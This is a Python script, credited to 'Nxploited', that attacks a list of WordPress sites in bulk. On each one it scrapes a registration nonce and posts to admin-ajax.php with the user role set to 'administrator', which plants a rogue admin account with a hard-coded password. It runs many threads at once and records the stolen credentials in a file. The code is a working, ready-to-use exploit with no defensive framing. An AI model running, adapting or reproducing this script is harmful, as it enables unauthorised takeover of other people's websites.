#!/usr/bin/env python3 import threading import requests import time import os import re import urllib3 import random from datetime import datetime from queue import Queue, Empty from rich.console import Console from rich.text import Text from rich.panel import Panel from rich.live import Live from rich.table import Table from rich.columns import Columns from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn, TimeElapsedColumn from rich.theme import Theme from rich import box urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) os.environ['NO_PROXY'] = '*' init_theme = Theme({ "banner": "bold green", "info_label": "bold bright_cyan", "info_value": "bright_white", "usage": "bold bright_yellow", "success": "bold white on dark_green", "fail": "bold white on red", "status": "bold bright_blue", "progress": "bold magenta" }) console = Console(theme=init_theme) PASSWORD = "xplpass" SUCCESS_FILE = "success_results.txt" DEBUG_DIR = "debug_responses" os.makedirs(DEBUG_DIR, exist_ok=True) state = { "total": 0, "processed": 0, "success": 0, "failed": 0, "current": None, "start_time": None, "last_results": [] } state_lock = threading.Lock() target_queue = Queue() DEFAULT_THREADS = 10 USERNAME_PREFIX = "Nxploited" def sanitize_target_for_filename(target_url: str) -> str: return re.sub(r'[^0-9a-zA-Z._-]', '_', target_url) def save_debug_response(target_url: str, resp_text: str) -> str: fname = sanitize_target_for_filename(target_url) + ".resp.txt" path = os.path.join(DEBUG_DIR, fname) try: with open(path, "w", encoding="utf-8", errors="ignore") as f: f.write(resp_text) except Exception: pass return path def write_result(filename: str, target: str, username: str, password: str, email: str): try: with open(filename, "a", encoding="utf-8") as f: f.write(f"{target} | USER: {username} | PASS: {password} | EMAIL: {email}\n") except Exception: pass def make_username_email() -> tuple[str, str]: rand_num = random.randint(1000, 9999) username = f"{USERNAME_PREFIX}_{rand_num}" email = f"{username}@gmail.com" return username, email def exploit_target_network(target_url: str, timeout: int = 16) -> tuple[bool, str, str, str]: headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"} reg_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" reg_page = f"{target_url.rstrip('/')}/register" username, email = make_username_email() password = PASSWORD try: resp = requests.get(reg_page, headers=headers, timeout=timeout, verify=False, allow_redirects=True) nonce_match = re.search(r'name=["\']ct_register_nonce["\']\s+value=["\']([a-fA-F0-9]+)["\']', resp.text) if not nonce_match: save_debug_response(target_url, f"NO NONCE\nRegister-page response:\n{resp.text[:600]}") return False, None, None, None nonce_val = nonce_match.group(1) payload = { 'action': 'ct_add_new_member', 'ct_user_login': username, 'ct_user_email': email, 'ct_user_pass': password, 'ct_user_pass_confirm': password, 'ct_user_first': 'Attacker', 'ct_user_last': 'Exploit', 'ct_user_mobile': '0000000000', 'ct_user_terms': 'on', 'ct_user_role': 'administrator', 'ct_register_nonce': nonce_val } exploit_resp = requests.post(reg_url, headers={'Content-Type': 'application/x-www-form-urlencoded', **headers}, data=payload, timeout=timeout, verify=False, allow_redirects=True) save_debug_response(target_url, exploit_resp.text) try: result = exploit_resp.json() except Exception: return False, None, None, None if result.get('success') in (True, 'true', 1, '1'): return True, username, password, email else: return False, None, None, None except Exception as e: save_debug_response(target_url, f"Exploit exception: {e}") return False, None, None, None def build_banner() -> Panel: ascii_lines = [ ":::: ::: ::: ::: ::::::::: ::: :::::::: ::::::::::: ::::::::::: :::::::::: ::::::::: ", ":+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: ", ":+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ ", "+#+ +:+ +#+ +#++:+ +#++:++#+ +#+ +#+ +:+ +#+ +#+ +#++:++# +#+ +:+ ", "+#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ ", "+#+ #+#+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# ", "### #### ### ### ### ########## ######## ########### ### ########## ######### ", ] txt = Text() colors = ["green"] * len(ascii_lines) for i, line in enumerate(ascii_lines): txt.append(line.rstrip() + "\n", style=f"bold {colors[i]}") txt.append("\n") txt.append(" Elegant Exploitation Dashboard — By: Nxploited (Khaled Alenazi)\n", style="bold bright_cyan") txt.append(" Telegram: https://t.me/KNxploited GitHub: https://github.com/Nxploited\n", style="bright_white") return Panel(txt, box=box.ASCII, padding=(1, 2), border_style="green", expand=True) def build_info_panel() -> Panel: table = Table.grid(padding=(0,1)) table.add_column(justify="right", ratio=1, style="info_label") table.add_column(justify="left", ratio=2, style="info_value") table.add_row("Usage:", "Put targets in list.txt, one per line. Run the script.") table.add_row("Threads:", "Choose number of worker threads.") table.add_row("Password:", f"{PASSWORD}") table.add_row("Success Log:", f"{SUCCESS_FILE}") table.add_row("Debug Dir:", f"{DEBUG_DIR}") return Panel(table, title="Info", border_style="bright_cyan", padding=(1,1), box=box.ROUNDED, expand=True) def build_stats_panel() -> Panel: with state_lock: total = state["total"] processed = state["processed"] success = state["success"] failed = state["failed"] current = state["current"] start_time = state["start_time"] tbl = Table.grid(expand=True) tbl.add_column(ratio=1) tbl.add_column(ratio=1) tbl.add_row(Text("Total Targets:", style="info_label"), Text(str(total), style="info_value")) tbl.add_row(Text("Processed:", style="info_label"), Text(str(processed), style="info_value")) tbl.add_row(Text("Successes:", style="info_label"), Text(str(success), style="info_value")) tbl.add_row(Text("Failures:", style="info_label"), Text(str(failed), style="info_value")) elapsed = "-" if start_time: elapsed = str(datetime.now() - start_time).split(".")[0] tbl.add_row(Text("Elapsed:", style="info_label"), Text(elapsed, style="info_value")) current_line = current or "-" tbl.add_row(Text("Current:", style="info_label"), Text(current_line, style="info_value")) return Panel(tbl, title="Stats", border_style="bright_green", padding=(1,1), box=box.ROUNDED, expand=True) def build_recent_panel() -> Panel: table = Table(box=box.SIMPLE, show_header=True, header_style="bold bright_magenta") table.add_column("Time", width=8) table.add_column("Target", overflow="fold") table.add_column("Result", width=10) with state_lock: last = list(state["last_results"])[-8:] for tstr, url, res in last: style = "bold green" if res == "SUCCESS" else "bold red" table.add_row(tstr, url, Text(res, style=style)) return Panel(table, title="Recent Results", border_style="bright_magenta", padding=(0,1), box=box.ROUNDED, expand=True) def build_dashboard() -> Panel: banner = build_banner() info = build_info_panel() stats = build_stats_panel() recent = build_recent_panel() col = Columns([info, stats], padding=2, expand=True) layout_table = Table.grid(expand=True) layout_table.add_row(banner) layout_table.add_row(col) layout_table.add_row(recent) return Panel(layout_table, box=box.SQUARE, padding=(0,0), border_style="bright_blue", expand=True) def worker_thread(thread_id: int): while True: try: target = target_queue.get_nowait() except Empty: return with state_lock: state["current"] = target try: success, username, password, email = exploit_target_network(target) now = datetime.now().strftime("%H:%M:%S") with state_lock: state["processed"] += 1 if success: state["success"] += 1 state["last_results"].append((now, target, "SUCCESS")) else: state["failed"] += 1 state["last_results"].append((now, target, "FAIL")) if len(state["last_results"]) > 200: state["last_results"] = state["last_results"][-200:] if success: console.print(f"[bold green]Exploited:[/] {target}") success_panel = Panel( Text.assemble( ("Username: ", "bold bright_cyan"), (f"{username}\n", "bright_white"), ("Password: ", "bold bright_cyan"), (f"{password}\n", "bright_white"), ("Email: ", "bold bright_cyan"), (f"{email}\n", "bright_white"), ), title="Credentials", border_style="green", padding=(1,2), box=box.ROUNDED ) console.print(success_panel) write_result(SUCCESS_FILE, target, username, password, email) else: console.print(f"[bold red]Failed:[/] {target}") except Exception as e: save_debug_response(target, f"Worker general exception: {e}") with state_lock: state["processed"] += 1 state["failed"] += 1 state["last_results"].append((datetime.now().strftime("%H:%M:%S"), target, "ERROR")) finally: with state_lock: state["current"] = None target_queue.task_done() def load_targets_from_file(filename: str) -> list[str]: targets = [] try: with open(filename, "r", encoding="utf-8", errors="ignore") as f: for line in f: url = line.strip() if not url: continue if not url.lower().startswith(("http://", "https://")): url = "http://" + url targets.append(url) except FileNotFoundError: console.print(f"[bold red]Targets file not found:[/] {filename}") return targets def parse_user_inputs() -> tuple[str, int]: console.print(Panel(Text("Please provide inputs", style="bold bright_cyan"), box=box.ROUNDED)) list_file = console.input("[bold bright_magenta]Targets file name (default list.txt): [/]").strip() or "list.txt" threads_str = console.input("[bold bright_magenta]Number of threads (default 10): [/]").strip() try: threads = int(threads_str) if threads_str else DEFAULT_THREADS except Exception: threads = DEFAULT_THREADS threads = max(1, min(200, threads)) return list_file, threads def show_initial_banner_once(): console.clear() console.print(build_banner()) time.sleep(1.0) def main(): list_file, num_threads = parse_user_inputs() targets = load_targets_from_file(list_file) if not targets: console.print("[bold red]No targets to process. Exiting.[/bold red]") return with state_lock: state["total"] = len(targets) state["processed"] = 0 state["success"] = 0 state["failed"] = 0 state["current"] = None state["start_time"] = datetime.now() state["last_results"] = [] for t in targets: target_queue.put(t) show_initial_banner_once() progress = Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("{task.completed}/{task.total}"), TimeElapsedColumn(), console=console, transient=False) progress_task = progress.add_task("Overall", total=len(targets)) dashboard_refresh = 0.4 threads = [] for i in range(num_threads): th = threading.Thread(target=worker_thread, args=(i,), daemon=True) th.start() threads.append(th) with Live(build_dashboard(), console=console, refresh_per_second=4) as live: while True: with state_lock: processed = state["processed"] progress.update(progress_task, completed=processed) live.update(build_dashboard()) if processed >= state["total"]: break time.sleep(dashboard_refresh) target_queue.join() for th in threads: th.join(timeout=0.1) with state_lock: total = state["total"] processed = state["processed"] success = state["success"] failed = state["failed"] summary = Table.grid() summary.add_column() summary.add_row(Text(f"Finished. Total: {total} Processed: {processed} Success: {success} Failed: {failed}", style="bold bright_green")) console.print(Panel(summary, title="Run Summary", border_style="bright_green", box=box.DOUBLE)) if __name__ == "__main__": main()